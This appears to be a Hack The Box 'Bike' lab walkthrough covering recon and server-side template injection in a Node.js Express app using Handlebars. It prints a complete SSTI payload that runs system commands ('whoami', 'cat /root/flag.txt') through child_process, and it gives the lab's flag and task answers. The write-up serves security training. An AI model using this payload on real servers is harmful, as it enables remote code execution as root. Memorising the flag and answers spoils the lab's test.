> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/starting-point-machines/tier-1-machines/bike.md).

# Bike

{% file src="/files/wYE4FPXQXBS2KYixFfV3" %}

**Task 1: What TCP ports does nmap identify as open? Answer with a list of ports separated by commas with no spaces, from low to high.**

* Run quick nmap scan:

```
nmap [Target IP]
```

* This shows that ports 22 & 80 are open.

**Task 2: What software is running the service listening on the http/web port identified in the first question?**

* Nmap version scan on port 80:

```
nmap -sV -p 80 [Target IP]
```

* The answer is Node.js

**Task 3: What is the name of the Web Framework according to Wappalyzer?**

* Open the target IP in your web browser.
* Make sure to have the Wappalyzer extension installed on your browser.&#x20;
* Once on the target page, check the Wappalyzer analysis.&#x20;
* ![](/files/HLqNIOCEc3ikj9oDE3WC)
* It shows Express as the Web Framework

**Task 4: What is the name of the vulnerability we test for by submitting {{7\*7}}?**

* Check the first part of the walkthrough given with the machine. This machine is based on server side template injection.

**Task 5: What is the templating engine being used within Node.JS?**

* On the web page of the target IP submit {{7\*7}} as a response to the email address form.
* This will take you to an error page.
* I browsed this page for a bit and found a reference in there to handlebars
*

```
<figure><img src="/files/uabyBwZ7kvKFgsnxa67E" alt=""><figcaption></figcaption></figure>
```

**Task 6: What is the name of the BurpSuite tab used to encode text?**

* Opening up Burpsuite I found that the tab is called "Decoder"

**Task 7: In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?**

* On the decoder tab of burpsuite you can use the drop down menu to see the different types of encoding.
* The answer is URL

**Task 8: When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?**

* Navigate to the Hacktricks URL and more specifically the section on SSTI and Node.JS Handlebars
  * <https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs>
* There is a script to exploit the form. You can either URL encrypt the scrypt yourself or grab the already URL-encrypted script at the bottom.
  \*

  ```
  <figure><img src="/files/mpidVl3pMDmJdYTFilsp" alt=""><figcaption></figcaption></figure>
  ```

  * Turn on FoxyProxy and input the URL encoded script into the email form of the target web page and submit.
  * The request should have been captured. From here, send the capture in Burpsuite to the Repeater.
  * Click send and you should capture a response page with an error at the top.
  * The error is going to specify that "Require" is not defined.
    \*

    ```
    <figure><img src="/files/5Z8jhdHqPC7Mxwu3DxMP" alt=""><figcaption></figcaption></figure>
    ```

**Task 9: What variable is the name of the top-level scope in Node.JS?**

* Reading through the walkthrough guide, I learned that the variable with the top-level scope is "Global".
  * This makes sense as global variable are applied throughout for other languages as well.

**Task 10: By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?**

* Start with the initial script from hacktricks.&#x20;
* We will modify this script and then URL encode it.

```
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
```

* After you have modified the script, URL encode it and send it through Burpsuites Repeater.
* You should get a response back that the user is "root"

**Capture the Flag:**

* Since we know the code above works, we can modify it again. We can either upload a reverse shell or just look for the flag.
  * In this case we will just look for the flag while modifying the script above. Normally though we would start a reverse shell and look through our host machine as that would be easier to navigate.
* In this case the flag is relatively easy to locate.

```
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
```

* It is located in the /root directory under flag.txt.
* The flag is "6b258d726d287462d60c103d0142a81c"
